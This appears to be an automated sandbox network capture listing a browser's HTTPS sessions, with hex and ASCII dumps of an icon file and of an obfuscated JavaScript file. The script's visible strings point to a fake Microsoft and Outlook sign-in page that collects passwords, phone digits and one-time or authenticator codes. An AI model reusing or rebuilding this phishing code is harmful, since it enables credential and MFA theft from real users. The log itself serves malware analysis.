                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1814INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1815INData Raw: 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1816INData Raw: 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44
                                                                                                                                                                                                                                                                                                              Data Ascii: DDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1818INData Raw: 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20 03 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333""""""""""" 33333333333"""""""""""
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1819INData Raw: 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1820INData Raw: 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 1e 4e f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 22 22 22 20 33 33 33 30 00 00 00 00 00 00 00 00 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 55 55 55 50 44 44 44 40 ff ff 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 ff ff 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01 00 00 01 01
                                                                                                                                                                                                                                                                                                              Data Ascii: N""" 3330""" 3330""" 3330""" 3330""" 3330""" 3330""" 3330UUUPDDD@UUUPDDD@UUUPDDD@UUUPDDD@UUUPDDD@UUUPDDD@UUUPDDD@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1821INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              161104.21.0.95443192.168.2.1649842C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1821INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:19 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Oct 2023 15:10:50 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"144c9-6084f82d547bf"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ejcol1SeVrq7xQats5u%2FhknpTmZd8eBeicoUXCMr0ptBajpdSg3tU9XIX%2BVr6wWeM8gNk%2FJFJLaBV34V788B2hxtVs9hfuJogfbyn4hdhbqYXzeSQheyuLYNHqZEZoXQ%2FywQzqUHpSKWPs0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd667bf3907dd-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1821INData Raw: 37 63 32 30 0d 0a 63 6f 6e 73 74 20 5f 30 78 33 37 30 33 33 32 3d 5f 30 78 34 37 61 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 36 32 35 33 33 2c 5f 30 78 61 30 39 64 38 61 29 7b 63 6f 6e 73 74 20 5f 30 78 34 65 39 33 63 65 3d 5f 30 78 34 37 61 62 2c 5f 30 78 33 66 34 66 31 65 3d 5f 30 78 37 36 32 35 33 33 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 62 62 33 61 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 65 39 33 63 65 28 30 78 31 65 38 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 65 39 33 63 65 28 30 78 32 35 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 65 39 33 63 65 28 30 78 32 37 34 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 65 39 33 63 65 28
                                                                                                                                                                                                                                                                                                              Data Ascii: 7c20const _0x370332=_0x47ab;(function(_0x762533,_0xa09d8a){const _0x4e93ce=_0x47ab,_0x3f4f1e=_0x762533();while(!![]){try{const _0x5bb3a0=-parseInt(_0x4e93ce(0x1e8))/0x1*(parseInt(_0x4e93ce(0x258))/0x2)+parseInt(_0x4e93ce(0x274))/0x3*(parseInt(_0x4e93ce(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1822INData Raw: 29 29 2f 30 78 62 3b 69 66 28 5f 30 78 35 62 62 33 61 30 3d 3d 3d 5f 30 78 61 30 39 64 38 61 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 66 34 66 31 65 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 66 34 66 31 65 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 61 65 33 35 33 33 29 7b 5f 30 78 33 66 34 66 31 65 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 66 34 66 31 65 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 32 64 30 2c 30 78 38 35 36 33 33 29 29 3b 63 6f 6e 73 74 20 5f 30 78 35 31 33 62 64 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 32 31 32 65 33 66 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 62 39 65 65 32 2c 5f 30 78 31 30 39 65 64 66 29 7b 63 6f 6e 73 74 20 5f 30
                                                                                                                                                                                                                                                                                                              Data Ascii: ))/0xb;if(_0x5bb3a0===_0xa09d8a)break;else _0x3f4f1e['push'](_0x3f4f1e['shift']());}catch(_0xae3533){_0x3f4f1e['push'](_0x3f4f1e['shift']());}}}(_0x42d0,0x85633));const _0x513bd9=(function(){let _0x212e3f=!![];return function(_0x1b9ee2,_0x109edf){const _0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1823INData Raw: 5d 3b 66 6f 72 28 6c 65 74 20 5f 30 78 34 39 66 63 64 61 3d 30 78 30 3b 5f 30 78 34 39 66 63 64 61 3c 5f 30 78 31 34 33 62 65 32 5b 27 6c 65 6e 67 74 68 27 5d 3b 5f 30 78 34 39 66 63 64 61 2b 2b 29 7b 63 6f 6e 73 74 20 5f 30 78 33 31 39 33 65 34 3d 5f 30 78 34 33 32 37 34 38 5b 5f 30 78 61 37 30 39 32 62 28 30 78 33 31 61 29 5d 5b 5f 30 78 61 37 30 39 32 62 28 30 78 32 33 37 29 5d 5b 27 62 69 6e 64 27 5d 28 5f 30 78 34 33 32 37 34 38 29 2c 5f 30 78 33 63 38 63 34 34 3d 5f 30 78 31 34 33 62 65 32 5b 5f 30 78 34 39 66 63 64 61 5d 2c 5f 30 78 32 34 36 32 34 64 3d 5f 30 78 32 34 33 37 61 32 5b 5f 30 78 33 63 38 63 34 34 5d 7c 7c 5f 30 78 33 31 39 33 65 34 3b 5f 30 78 33 31 39 33 65 34 5b 5f 30 78 61 37 30 39 32 62 28 30 78 33 30 61 29 5d 3d 5f 30 78 34 33 32
                                                                                                                                                                                                                                                                                                              Data Ascii: ];for(let _0x49fcda=0x0;_0x49fcda<_0x143be2['length'];_0x49fcda++){const _0x3193e4=_0x432748[_0xa7092b(0x31a)][_0xa7092b(0x237)]['bind'](_0x432748),_0x3c8c44=_0x143be2[_0x49fcda],_0x24624d=_0x2437a2[_0x3c8c44]||_0x3193e4;_0x3193e4[_0xa7092b(0x30a)]=_0x432
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1825INData Raw: 29 5b 27 63 6c 69 63 6b 27 5d 28 29 3b 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 5f 30 78 31 31 66 33 30 30 29 7b 63 6f 6e 73 74 20 5f 30 78 38 37 37 31 38 63 3d 5f 30 78 33 37 30 33 33 32 3b 5f 30 78 31 31 66 33 30 30 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 38 37 37 31 38 63 28 30 78 32 35 39 29 5d 28 27 73 65 63 74 69 6f 6e 5f 27 2b 76 69 65 77 29 5b 5f 30 78 38 37 37 31 38 63 28 30 78 31 63 61 29 5d 28 5f 30 78 38 37 37 31 38 63 28 30 78 32 61 38 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 38 37 37 31 38 63 28 30 78 32 64 38 29 5d 28 5f 30 78 38 37 37 31 38 63 28 30 78 33 30 33 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 38 37 37 31 38 63 28 30 78 32 35 39 29 5d 28 27 73 65
                                                                                                                                                                                                                                                                                                              Data Ascii: )['click']();});function loadinganimation(_0x11f300){const _0x87718c=_0x370332;_0x11f300==0x0&&(document[_0x87718c(0x259)]('section_'+view)[_0x87718c(0x1ca)](_0x87718c(0x2a8))['classList'][_0x87718c(0x2d8)](_0x87718c(0x303)),document[_0x87718c(0x259)]('se
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1826INData Raw: 27 2c 27 6e 61 6d 65 27 2c 27 68 69 64 65 2d 74 6f 2d 72 69 67 68 74 5c 78 32 30 27 2c 27 67 65 74 5c 78 32 30 61 5c 78 32 30 63 6f 64 65 5c 78 32 30 61 5c 78 32 30 64 69 66 66 65 72 65 6e 74 5c 78 32 30 77 61 79 2e 27 2c 27 70 61 73 73 77 6f 72 64 27 2c 27 66 6f 72 45 61 63 68 27 2c 27 37 30 31 39 37 30 30 53 77 53 7a 70 54 27 2c 27 6c 61 72 67 65 49 63 6f 6e 27 2c 27 70 61 72 73 65 27 2c 27 61 63 63 65 73 73 62 6c 6f 63 6b 65 64 27 2c 27 73 65 63 74 69 6f 6e 73 27 2c 27 64 79 6e 61 6d 69 63 2d 73 74 79 6c 65 27 2c 27 61 75 74 68 63 61 6c 6c 27 2c 27 63 61 6e 63 65 6c 6d 69 63 72 6f 73 6f 66 74 27 2c 27 74 72 61 63 65 27 2c 27 3c 2f 6c 61 62 65 6c 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c
                                                                                                                                                                                                                                                                                                              Data Ascii: ','name','hide-to-right\x20','get\x20a\x20code\x20a\x20different\x20way.','password','forEach','7019700SwSzpT','largeIcon','parse','accessblocked','sections','dynamic-style','authcall','cancelmicrosoft','trace','</label>\x0a\x20\x20\x20\x20\x20\x20</div>\
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1827INData Raw: 2c 27 72 65 6c 61 74 69 76 65 27 2c 27 6f 75 74 6c 6f 6f 6b 2e 63 6f 6d 27 2c 27 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 27 2c 27 73 65 63 74 69 6f 6e 5f 75 6e 61 6d 65 27 2c 27 67 6f 64 61 64 64 79 27 2c 27 64 69 72 6c 74 72 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 27 2c 27 6e 65 77 77 65 62 73 69 74 65 6f 70 65 6e 27 2c 27 73 65 74 50 72 6f 70 65 72 74 79 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 27 2c 27 69 6e 66 6f 27 2c 27 62 61 63 6b 62 75 74 74 6f 6e 27 2c 27 69 6e 70 5f 6f 74 70 63 6f 64 65 27 2c 27 69 63 6c 6f 75 64 2e 63 6f 6d 27 2c 27 2f 69 6e 66 6f 27 2c 27 61 72 69 61 2d 63 68 65 63 6b 65 64 27 2c 27 2f 61 73 73 65 74 73 2f 6a 73 2f 70 61 67 65 73 2d 27 2c 27 6d 75 6c 74 69 70 6c 65 5c 78 32 30 61 63
                                                                                                                                                                                                                                                                                                              Data Ascii: ,'relative','outlook.com','text-block-body','section_uname','godaddy','dirltr','linkoptionclick','newwebsiteopen','setProperty','background-position','info','backbutton','inp_otpcode','icloud.com','/info','aria-checked','/assets/js/pages-','multiple\x20ac
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1829INData Raw: 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 27 2c 27 69 64 70 44 65 73 63 72 69 70 74 69 6f 6e 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 2c 27 66 61 64 65 69 6e 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30 66 6f 72 77 61 72 64 73 27 2c 27 72 61 64 69 6f 27 2c 27 6f 74 70 69 6d 67 27 2c 27 68 61 73 41 74 74 72 69 62 75 74 65 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 70 6f 70 27 2c 27 6d 62 2d 31 36 27 2c 27 33 36 70 78 27 2c 27 68 72 65 66 27 2c 27 73 69 67 6e 74 6f 61 6e 6f 74 68 65 72 77 65 62 27 2c 27 73 65 63 74 69 6f 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 27 2c 27 23 66 35 66 37 66 38 27 2c 27 66 69 6e 61 6c 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 5c 78 32 30 65 72 72 6f 72 27
                                                                                                                                                                                                                                                                                                              Data Ascii: _confirmemail','idpDescription','otp\x20sent','(((.+)+)+)+$','fadeinform\x201s\x20forwards','radio','otpimg','hasAttribute','multipleaccounts','pop','mb-16','36px','href','signtoanotherweb','section_protectaccount','#f5f7f8','final','otp\x20sent\x20error'
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1830INData Raw: 63 6c 61 73 73 3d 5c 78 32 32 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 54 6f 5c 78 32 30 76 65 72 69 66 79 5c 78 32 30 74 68 61 74 5c 78 32 30 74 68 69 73 5c 78 32 30 69 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 2c 5c 78 32 30 65 6e 74 65 72 5c 78 32 30 74 68 65 5c 78 32 30 6c 61 73 74 5c 78 32 30 34 5c 78 32 30 64 69 67 69 74 73 5c 78 32 30 69 6e 63 6c 75 64 69 6e 67 5c 78 32 30 27 2c 27 63 6f 6e 73 6f 6c 65 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73
                                                                                                                                                                                                                                                                                                              Data Ascii: class=\x22text-block-body\x22\x20id=\x22iEnterProofDesc\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20To\x20verify\x20that\x20this\x20is\x20your\x20phone\x20number,\x20enter\x20the\x20last\x204\x20digits\x20including\x20','console','location','getElementsByClas
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1831INData Raw: 74 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 69 76 65 3d 5c 78 32 32 61 73 73 65 72 74 69 76 65 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 61 6c 65 72 74 5c 78 32 30 61 6c 65 72 74 2d 65 72 72 6f 72 5c 78 32 30 48 69 64 65 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 50 61 72 74 69 61 6c 5c 78
                                                                                                                                                                                                                                                                                                              Data Ascii: t\x22\x20aria-live=\x22assertive\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22alert\x20alert-error\x20Hide\x22\x20id=\x22iProofInputError\x22></div>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22emailPartial\x
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1833INData Raw: 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 2c 27 62 61 63 6b 62 74 6e 63 6c 69 63 6b 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 2c 27 73 74 61 74 75 73 27 2c 27 61 5f 74 65 78 74 27 2c 27 65 6e 74 65 72 6f 74 70 27 2c 27 45 72 72 6f 72 3a 27 2c 27 73 70 61 6e 27 2c 27 61 75 74 68 61 70 70 63 6f 64 65 27 2c 27 65 72 72 6f 72 2d 69 6e 70 27 2c 27 56 65 72 69 66 79 5c 78 32 30 4f 6e 6c 69 6e 65 27 2c 27 73 61 76 65 6d 69 73 73 69 6e 67 27 2c 27 75 6e 61 6d 65 27 2c 27 63 6f 72 72 65 63 74 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 77 69 74 68 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 5c 78 32 30 63 6f 6c 6f 72 27 2c 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 61 6e 69 6d 61 74 69 6f 6e 27 2c 27 74 72 69 6d 27 2c 27 2e 75 73 65 72 5f 69 64 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 'getElementById','backbtnclick','backgroundImage','status','a_text','enterotp','Error:','span','authappcode','error-inp','Verify\x20Online','savemissing','uname','correct\x20email\x20with\x20background\x20color','appendChild','animation','trim','.user_ide
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1834INData Raw: 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 6e 6f 52 69 67 68 74 42 6f 72 64 65 72 5c 78 32 32 5c 78 32 30 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 5c 78 32 32 6f 66 66 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6d 61 78 6c 65 6e 67 74 68 3d 5c 78 32 32 31 31 33 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 45 6d 61 69 6c 5c 78 32 30 6e 61 6d 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64
                                                                                                                                                                                                                                                                                                              Data Ascii: lass=\x22form-control\x20noRightBorder\x22\x20autocomplete=\x22off\x22\x20type=\x22email\x22\x20id=\x22iProofEmail\x22\x20name=\x22iProofEmail\x22\x20maxlength=\x22113\x22\x20aria-required=\x22true\x22\x20aria-label=\x22Email\x20name\x22\x20aria-described
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1835INData Raw: 5c 78 32 30 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 64 64 72 65 73 73 2c 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 2c 5c 78 32 30 6f 72 5c 78 32 30 53 6b 79 70 65 5c 78 32 30 6e 61 6d 65 2e 27 2c 27 73 65 63 74 69 6f 6e 5f 6f 74 70 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 61 64 66 73 27 2c 27 68 65 69 67 68 74 27 2c 27 65 72 72 6f 72 5f 75 6e 61 6d 65 27 2c 27 61 75 74 68 61 70 70 65 72 72 6f 72 64 65 73 63 27 2c 27 6d 65 73 73 61 67 65 27 2c 27 73 65 61 72 63 68 27 2c 27 6c 6f 67 27 2c 27 74 61 62 69 6e 64 65 78 27 2c 27 63 6c 61 73 73 4c 69 73 74 27 2c 27 5c 78 32 32 5c 78 32 30 6f 6e 63 6c 69 63 6b 3d 5c 78 32 32 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 5c 78 32 32 3e 27 2c 27 6f 74
                                                                                                                                                                                                                                                                                                              Data Ascii: \x20valid\x20email\x20address,\x20phone\x20number,\x20or\x20Skype\x20name.','section_otp','multipleaccountsadfs','height','error_uname','authapperrordesc','message','search','log','tabindex','classList','\x22\x20onclick=\x22linkoptionclick(this)\x22>','ot
